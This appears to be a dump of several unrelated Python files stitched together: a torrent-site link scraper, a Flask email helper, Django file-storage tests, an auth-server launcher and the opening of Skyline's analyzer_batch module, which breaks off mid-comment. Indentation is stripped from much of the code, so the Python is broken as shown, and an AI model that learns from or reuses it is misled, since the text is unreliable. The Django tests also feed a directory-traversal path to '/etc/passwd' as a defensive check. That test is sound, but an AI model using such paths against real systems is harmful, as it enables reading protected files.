torrent = result[api_format['torrent']]
if 'download_path' in definition:
torrent = definition['base_url'] + definition['download_path'] + torrent
if client.token:
user_agent = USER_AGENT
headers = {'Authorization': client.token, 'User-Agent': user_agent}
log.debug("[%s] Appending headers: %s" % (provider, repr(headers)))
torrent = append_headers(torrent, headers)
log.debug("[%s] Torrent with headers: %s" % (provider, repr(torrent)))
if 'info_hash' in api_format:
info_hash = result[api_format['info_hash']]
if 'quality' in api_format: # Again quite specific to YTS...
name = "%s - %s" % (name, result[api_format['quality']])
if 'size' in api_format:
size = result[api_format['size']]
if isinstance(size, (long, int)):
size = sizeof(size)
elif isinstance(size, basestring) and size.isdigit():
size = sizeof(int(size))
if 'seeds' in api_format:
seeds = result[api_format['seeds']]
if isinstance(seeds, basestring) and seeds.isdigit():
seeds = int(seeds)
if 'peers' in api_format:
peers = result[api_format['peers']]
if isinstance(peers, basestring) and peers.isdigit():
peers = int(peers)
yield (name, info_hash, torrent, size, seeds, peers)
def extract_from_page(provider, content):
""" Sub-page extraction method
Args:
provider (str): Provider ID
content (str): Page content from Client instance
Returns:
str: Torrent or magnet link extracted from sub-page
"""
definition = definitions[provider]
definition = get_alias(definition, get_setting("%s_alias" % provider))
try:
matches = re.findall(r'magnet:\?[^\'"\s<>\[\]]+', content)
if matches:
result = matches[0]
log.debug('[%s] Matched magnet link: %s' % (provider, repr(result)))
return result
matches = re.findall('http(.*?).torrent["\']', content)
if matches:
result = 'http' + matches[0] + '.torrent'
result = result.replace('torcache.net', 'itorrents.org')
log.debug('[%s] Matched torrent link: %s' % (provider, repr(result)))
return result
matches = re.findall('/download\?token=[A-Za-z0-9%]+', content)
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link with token: %s' % (provider, repr(result)))
return result
matches = re.findall('"(/download/[A-Za-z0-9]+)"', content)
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link: %s' % (provider, repr(result)))
return result
matches = re.findall('/torrents/download/\?id=[a-z0-9-_.]+', content) # t411
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link with an ID: %s' % (provider, repr(result)))
return result
matches = re.findall('\: ([A-Fa-f0-9]{40})', content)
if matches:
result = "magnet:?xt=urn:btih:" + matches[0]
log.debug('[%s] Matched magnet info_hash search: %s' % (provider, repr(result)))
return result
matches = re.findall('/download.php\?id=([A-Za-z0-9]{40})\W', content)
if matches:
result = "magnet:?xt=urn:btih:" + matches[0]
log.debug('[%s] Matched download link: %s' % (provider, repr(result)))
return result
matches = re.findall('(/download.php\?id=[A-Za-z0-9]+[^\s\'"]*)', content)
if matches:
result = definition['root_url'] + matches[0]
log.debug('[%s] Matched download link: %s' % (provider, repr(result)))
return result
except:
pass
return None
def run_provider(provider, payload, method):
""" Provider thread entrypoint
Args:
provider (str): Provider ID
payload (dict): Search payload from Elementum
method (str): Type of search, can be ``general``, ``movie``, ``show``, ``season`` or ``anime``
"""
log.debug("[%s] Processing %s with %s method" % (provider, provider, method))
filterInstance = Filtering()
if method == 'movie':
filterInstance.use_movie(provider, payload)
elif method == 'season':
filterInstance.use_season(provider, payload)
elif method == 'episode':
filterInstance.use_episode(provider, payload)
elif method == 'anime':
filterInstance.use_anime(provider, payload)
else:
filterInstance.use_general(provider, payload)
if 'is_api' in definitions[provider]:
results = process(provider=provider, generator=extract_from_api, filtering=filterInstance, has_special=payload['has_special'], skip_auth=payload['skip_auth'])
else:
results = process(provider=provider, generator=extract_torrents, filtering=filterInstance, has_special=payload['has_special'], skip_auth=payload['skip_auth'])
got_results(provider, results)
def get_search_query(definition, key):
if 'parser' not in definition or key not in definition['parser']:
return ""
if key == 'key' or key == 'table' or key == 'row':
return "dom." + definition['parser'][key]
return definition['parser'][key]
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
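# Minimal usage sketch (hypothetical recipient and template name; assumes
# templates/mail/new_user.txt and templates/mail/new_user.html exist):
#
#     thr = send_email('admin@example.com', 'New User', 'mail/new_user', user=user)
#     thr.join()  # optional: only if the caller needs to wait for the send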
|
tests.py
|
# -*- coding: utf-8 -*-
import os
import shutil
import sys
import tempfile
import time
from datetime import datetime, timedelta
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
import threading
except ImportError:
import dummy_threading as threading
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.images import get_image_dimensions
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import UploadedFile
from django.core.exceptions import ImproperlyConfigured
from django.utils import unittest
# Try to import PIL in either of the two ways it can end up installed.
# Checking for the existence of Image is enough for CPython, but
# for PyPy, you need to check for the underlying modules
try:
from PIL import Image, _imaging
except ImportError:
try:
import Image, _imaging
except ImportError:
Image = None
class GetStorageClassTests(unittest.TestCase):
def assertRaisesErrorWithMessage(self, error, message, callable,
*args, **kwargs):
self.assertRaises(error, callable, *args, **kwargs)
try:
callable(*args, **kwargs)
except error, e:
self.assertEqual(message, str(e))
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
self.assertRaisesErrorWithMessage(
ImproperlyConfigured,
"NonExistingStorage isn't a storage module.",
get_storage_class,
'NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
self.assertRaisesErrorWithMessage(
ImproperlyConfigured,
'Storage module "django.core.files.storage" does not define a '\
'"NonExistingStorage" class.',
get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
# Error message may or may not be the fully qualified path.
self.assertRaisesRegexp(
ImproperlyConfigured,
('Error importing storage module django.core.files.non_existing_'
'storage: "No module named .*non_existing_storage"'),
get_storage_class,
'django.core.files.non_existing_storage.NonExistingStorage'
)
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mktemp()
os.makedirs(self.temp_dir)
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.failIf(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assert_(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.failIf(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assert_(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.failIf(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
def test_file_with_mixin(self):
"""
File storage can get a mixin to extend the functionality of the
returned file.
"""
self.failIf(self.storage.exists('test.file'))
class TestFileMixin(object):
mixed_in = True
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assert_(isinstance(
self.storage.open('test.file', mixin=TestFileMixin),
TestFileMixin
))
self.storage.delete('test.file')
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.failIf(self.storage.exists('storage_test_1'))
self.failIf(self.storage.exists('storage_test_2'))
self.failIf(self.storage.exists('storage_dir_1'))
f = self.storage.save('storage_test_1', ContentFile('custom content'))
f = self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), set([u'storage_dir_1']))
self.assertEqual(set(files),
set([u'storage_test_1', u'storage_test_2']))
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class UnicodeFileNameTests(unittest.TestCase):
def test_unicode_file_names(self):
"""
        Regression test for #8156: files with unicode names. I can't quite figure
out the encoding situation between doctest and this file, but the actual
repr doesn't matter; it just shouldn't return a unicode object.
"""
        uf = UploadedFile(name=u'¿Cómo?', content_type='text')
self.assertEqual(type(uf.__repr__()), str)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
        return super(SlowFile, self).chunks()
class FileSaveRaceConditionTest(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile("Data"))
def test_race_condition(self):
self.thread.start()
name = self.save_file('conflict')
self.thread.join()
self.assert_(self.storage.exists('conflict'))
self.assert_(self.storage.exists('conflict_1'))
self.storage.delete('conflict')
self.storage.delete('conflict_1')
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.old_perms = settings.FILE_UPLOAD_PERMISSIONS
settings.FILE_UPLOAD_PERMISSIONS = 0666
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
settings.FILE_UPLOAD_PERMISSIONS = self.old_perms
shutil.rmtree(self.storage_dir)
def test_file_upload_permissions(self):
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0777
self.assertEqual(actual_mode, 0666)
class FileStoragePathParsing(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
self.failIf(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
# Before 2.6, a leading dot was treated as an extension, and so
# underscore gets added to beginning instead of end.
if sys.version_info < (2, 6):
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/_1.test')))
else:
self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class DimensionClosingBug(unittest.TestCase):
"""
Test that get_image_dimensions() properly closes files (#8817)
"""
@unittest.skipUnless(Image, "PIL not installed")
def test_not_closing_of_files(self):
"""
Open files passed into get_image_dimensions() should stay opened.
"""
empty_io = StringIO()
try:
get_image_dimensions(empty_io)
finally:
self.assert_(not empty_io.closed)
@unittest.skipUnless(Image, "PIL not installed")
def test_closing_of_filenames(self):
"""
get_image_dimensions() called with a filename should closed the file.
"""
# We need to inject a modified open() builtin into the images module
# that checks if the file was closed properly if the function is
# called with a filename instead of an file object.
# get_image_dimensions will call our catching_open instead of the
# regular builtin one.
class FileWrapper(object):
_closed = []
def __init__(self, f):
self.f = f
def __getattr__(self, name):
return getattr(self.f, name)
def close(self):
self._closed.append(True)
self.f.close()
def catching_open(*args):
return FileWrapper(open(*args))
from django.core.files import images
images.open = catching_open
try:
get_image_dimensions(os.path.join(os.path.dirname(__file__), "test1.png"))
finally:
del images.open
self.assert_(FileWrapper._closed)
class InconsistentGetImageDimensionsBug(unittest.TestCase):
"""
Test that get_image_dimensions() works properly after various calls
using a file handler (#11158)
"""
@unittest.skipUnless(Image, "PIL not installed")
def test_multiple_calls(self):
"""
Multiple calls of get_image_dimensions() should return the same size.
"""
from django.core.files.images import ImageFile
img_path = os.path.join(os.path.dirname(__file__), "test.png")
image = ImageFile(open(img_path, 'rb'))
image_pil = Image.open(img_path)
size_1, size_2 = get_image_dimensions(image), get_image_dimensions(image)
self.assertEqual(image_pil.size, size_1)
self.assertEqual(size_1, size_2)
|
handler.py
|
import shelve
import socket
import subprocess
import time
from threading import Thread
import requests
from codesync.auth.server import start_server
from codesync.constants import CACHE_FILE_PATH
from codesync.settings import IS_DEV
class AuthServerHandler(object):
@staticmethod
def get_open_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
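# Binding to port 0 asks the OS to allocate a free ephemeral port; the
# socket is then closed so the port number can be handed to the auth server.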
@staticmethod
def get_port_from_shelve():
d = shelve.open(CACHE_FILE_PATH)
port = d.get('port')
d.close()
return port
@staticmethod
def clean_up_shelve():
# Clean up shelve
d = shelve.open(CACHE_FILE_PATH)
for key in ['access_token']:
if d.get(key):
del d[key]
d.close()
@staticmethod
def start_thread(port):
thread = Thread(target=start_server, args=(port,))
thread.daemon = True
thread.start()
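# As a daemon thread, the auth server will not keep the process alive on
# its own once the main thread exits.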
def check_server_running(self):
# See if saved port is working
port = self.get_port_from_shelve()
if port:
plugin_server = f"http://localhost:{port}"
try:
response = requests.get(plugin_server)
# TODO: Improve this by verifying specific response
server_is_up = response.ok
if server_is_up:
self.clean_up_shelve()
return port
except Exception:
pass
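# Implicitly returns None when no port has been saved or the saved
# server is no longer responding.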
def trigger_from_cli(self):
# Get port and set in shelve
port = self.get_open_port()
d = shelve.open(CACHE_FILE_PATH)
d['port'] = port
d.close()
command = f"python3 -m codesync.cli --run-auth-server -p {port}" if IS_DEV else \
f"codesync --run-auth-server -p {port}"
try:
subprocess.Popen(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
except Exception:
print("Failed to start auth-server")
raise
# Sleep added to wait for the server to start
time.sleep(3)
return port
def restart(self):
port = self.check_server_running()
if not port:
self.clean_up_shelve()
port = self.get_open_port()
d = shelve.open(CACHE_FILE_PATH)
d['port'] = port
d.close()
self.start_thread(port)
return port
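# A hypothetical usage sketch (illustrative only, not from this module):
#   handler = AuthServerHandler()
#   port = handler.restart()  # reuses a running server or starts a new one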
|
analyzer_batch.py
|
from __future__ import division
import logging
try:
from Queue import Empty
except:
from queue import Empty
from time import time, sleep
from threading import Thread
from collections import defaultdict
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager, Queue
from multiprocessing import Process, Queue
from msgpack import Unpacker
import os
from os import kill, getpid
import traceback
import re
from sys import version_info
import os.path
from ast import literal_eval
import settings
from skyline_functions import (
write_data_to_file, send_anomalous_metric_to, mkdir_p,
filesafe_metricname,
# @added 20170602 - Feature #2034: analyse_derivatives
nonNegativeDerivative, strictly_increasing_monotonicity, in_list,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20200506 - Feature #3532: Sort all time series
sort_timeseries)
# @added 20200425 - Feature #3512: matched_or_regexed_in_list function
# Feature #3508: ionosphere_untrainable_metrics
# Feature #3486: analyzer_batch
from matched_or_regexed_in_list import matched_or_regexed_in_list
# @modified 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Changed to algorithms_batch so there is no pollution and
# analyzer and analyzer_batch are totally independent
# from algorithms import run_selected_algorithm
from algorithms_batch import run_selected_batch_algorithm
from algorithm_exceptions import TooShort, Stale, Boring
# TODO if settings.ENABLE_CRUCIBLE: and ENABLE_PANORAMA
# from spectrum import push_to_crucible
skyline_app = 'analyzer_batch'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20190410 - Feature #2916: ANALYZER_ENABLED setting
try:
ANALYZER_ENABLED = settings.ANALYZER_ENABLED
logger.info('ANALYZER_ENABLED is set to %s' % str(ANALYZER_ENABLED))
except:
ANALYZER_ENABLED = True
logger.info('warning :: ANALYZER_ENABLED is not declared in settings.py, defaults to True')
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrics have negative values so they can be
# added to the ionosphere.untrainable_metrics Redis set
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
KNOWN_NEGATIVE_METRICS = list(settings.KNOWN_NEGATIVE_METRICS)
except:
KNOWN_NEGATIVE_METRICS = []
# @added 20200607 - Feature #3566: custom_algorithms
try:
CUSTOM_ALGORITHMS = settings.CUSTOM_ALGORITHMS
except:
CUSTOM_ALGORITHMS = None
try:
DEBUG_CUSTOM_ALGORITHMS = settings.DEBUG_CUSTOM_ALGORITHMS
except:
DEBUG_CUSTOM_ALGORITHMS = False
# @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
try:
from settings import ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
except:
ROOMBA_DO_NOT_PROCESS_BATCH_METRICS = False
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
try:
from types import TupleType
except ImportError:
eliminated_in_python3 = True
from redis import WatchError
from msgpack import packb
# @added 20200817 - Feature #3684: ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
# Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Allow for custom durations on namespaces
ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS = []
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
try:
from settings import ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
except:
ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS = []
# @added 20200815 - Feature #3678: SNAB - anomalyScore
try:
SNAB_DATA_DIR = settings.SNAB_DATA_DIR
except:
SNAB_DATA_DIR = '/opt/skyline/SNAB'
try:
SNAB_anomalyScore = settings.SNAB_anomalyScore
except:
SNAB_anomalyScore = {}
# @added 20201017 - Feature #3818: ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
try:
ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED = settings.ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
except:
ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED = False
try:
BATCH_MODE = settings.BATCH_PROCESSING_BATCH_MODE
except:
BATCH_MODE = True
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
LOCAL_DEBUG = False
class AnalyzerBatch(Thread):
"""
The AnalyzerBatch class which controls the analyzer.batch thread and spawned
processes.
Made with love to the analyzer_batch playlist:
https://soundcloud.com/earthgecko/sets/analyzer_batch
https://soundcloud.com/thedeltariggs/ode-to-jeremiah (I can't tell what I've seen..)
https://soundcloud.com/egroove/premiere-francesco-chiocci-feat-black-soda-musumeci-remix-connaisseur-recordings (picking up pieces of my weary mind)
https://soundcloud.com/when-we-dip/premiere-francesco-chiocci-ft-black-soda-black-sunrise-peter-pardeike-remix
https://soundcloud.com/timgreen/atelier-francesco-manuel-feat-astrid-dead-end-tim-green-remixcityfox-1
https://soundcloud.com/imbernonmusic/edu-imbernon-fixing-fires
https://soundcloud.com/deep-house-amsterdam/oliver-koletzki-deep-house-amsterdam-dgtl-podcast-007
https://soundcloud.com/crosstownrebels/crm140-damian-lazarus-the-ancient-moons-vermillion-agoria-remix-1
https://soundcloud.com/wiewouwat/joy-wellboy-before-the-sunrise
https://soundcloud.com/agoria/damian-lazarus-the-ancent-moons-vermillion-agoria-remix
https://soundcloud.com/wearesoundspace/premiere-just-her-feat-kieran-fowkes-let-myself-go
https://soundcloud.com/watergaterecords/matthias-meyer-november-rain
https://soundcloud.com/musicthatmakesmewannasurf/mixtape-2-w-kosson
"""
def __init__(self, parent_pid):
"""
Initialize the AnalyzerBatch
Create the :obj:`self.batch_exceptions_q` queue
Create the :obj:`self.batch_anomaly_breakdown_q` queue
"""
super(AnalyzerBatch, self).__init__()
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.batch_exceptions_q = Queue()
self.batch_anomaly_breakdown_q = Queue()
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
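# kill(pid, 0) sends no signal; it only checks that the process exists,
# so an exception here means the parent (or this process) is gone and
# this worker exits.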
def spin_batch_process(self, i, run_timestamp, metric_name, last_analyzed_timestamp, batch=[]):
"""
Assign a metric and last_analyzed_timestamp for a process to analyze.
:param i: python process id
:param run_timestamp: the epoch timestamp at which this process was called
:param metric_name: the FULL_NAMESPACE metric name as keyed in Redis
:param last_analyzed_timestamp: the last analysed timestamp as recorded
in the Redis last_timestamp.<base_name> key.
:param batch: a list of [metric_name, last_analyzed_timestamp] items to
process in batch mode (defaults to an empty list)
:return: None
"""
spin_start = time()
child_batch_process_pid = os.getpid()
metrics_processed = 0
if not batch:
batch_mode = False
metrics = [[metric_name, last_analyzed_timestamp]]
logger.info('child_batch_process_pid - %s, processing %s from %s' % (
str(child_batch_process_pid), metric_name, str(last_analyzed_timestamp)))
else:
batch_mode = True
metrics = batch
number_of_metrics = len(batch)
logger.info('child_batch_process_pid - %s, processing %s metrics in batch mode' % (
str(child_batch_process_pid), str(number_of_metrics)))
# Make process-specific dicts
exceptions = defaultdict(int)
anomaly_breakdown = defaultdict(int)
# Determine the unique Mirage and Ionosphere metrics once, which are
# used later to determine how Analyzer should handle/route anomalies
try:
mirage_unique_metrics = list(self.redis_conn_decoded.smembers('mirage.unique_metrics'))
except:
mirage_unique_metrics = []
try:
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
ionosphere_unique_metrics = []
# In order to convert monotonic, incrementing metrics to a derivative
# metric
try:
derivative_metrics = list(self.redis_conn_decoded.smembers('derivative_metrics'))
except:
derivative_metrics = []
try:
non_derivative_metrics = list(self.redis_conn_decoded.smembers('non_derivative_metrics'))
except:
non_derivative_metrics = []
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
non_derivative_monotonic_metrics = list(settings.NON_DERIVATIVE_MONOTONIC_METRICS)
except:
non_derivative_monotonic_metrics = []
non_smtp_alerter_metrics = []
try:
non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('analyzer.non_smtp_alerter_metrics'))
except:
non_smtp_alerter_metrics = []
for item in metrics:
metric_name = item[0]
last_analyzed_timestamp = item[1]
if batch_mode:
metrics_processed += 1
logger.info('processing metric %s of %s' % (
str(metrics_processed), str(number_of_metrics)))
# Identify last timestamp
metric_timestamp = None
# Identify anomalies
# Handle EXPIRATION_TIME
# Ship to Analyzer, Mirage or Ionosphere
# @added 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# If multiple work items exist and the timestamp in the work item is
# older than the last analyzed timestamp reported by Redis key, just
# skip and remove the work item
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
# Check the last_timestamp metric Redis key
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
redis_key_set = None
last_redis_timestamp = 0
try:
last_redis_timestamp_data = self.redis_conn_decoded.get(last_metric_timestamp_key)
last_redis_timestamp = int(last_redis_timestamp_data)
except:
logger.error('error :: failed to get Redis key %s' % last_metric_timestamp_key)
get_raw_series = True
if last_redis_timestamp:
if last_redis_timestamp > last_analyzed_timestamp:
get_raw_series = False
logger.info('The %s is %s, the passed last_analyzed_timestamp is %s, not getting raw_series, returning' % (
last_metric_timestamp_key, str(last_redis_timestamp),
str(last_analyzed_timestamp)))
if LOCAL_DEBUG:
logger.debug('debug :: getting Redis time series data for %s' % (base_name))
raw_series = None
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only resurface the timeseries if the work item timestamp is greater
# than the last analyzed timestamp reported by Redis key
if get_raw_series:
try:
raw_series = self.redis_conn.get(metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s from Redis' % metric_name)
raw_series = None
if not raw_series:
logger.info('No raw_series defined, returning')
# Remove from work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
if batch_mode:
continue
else:
return
try:
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
except:
timeseries = []
# @added 20200506 - Feature #3532: Sort all time series
# To ensure that there are no unordered timestamps in the time
# series which are artefacts of the collector or carbon-relay, sort
# all time series by timestamp before analysis.
original_timeseries = timeseries
if original_timeseries:
timeseries = sort_timeseries(original_timeseries)
del original_timeseries
try:
del raw_series
except:
pass
if LOCAL_DEBUG:
logger.debug('debug :: got Redis time series data for %s' % (base_name))
# @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# euthanize keys if not done in roomba, allows for backfill processing
# via analyzer_batch
roombaed = False
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
if LOCAL_DEBUG:
logger.debug('debug :: checking if roomba needs to be run on %s' % (base_name))
now = int(time())
duration = settings.FULL_DURATION + settings.ROOMBA_GRACE_TIME
key = metric_name
# @added 20200817 - Feature #3684: ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
# Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Allow for custom durations on namespaces. This is for testing, to
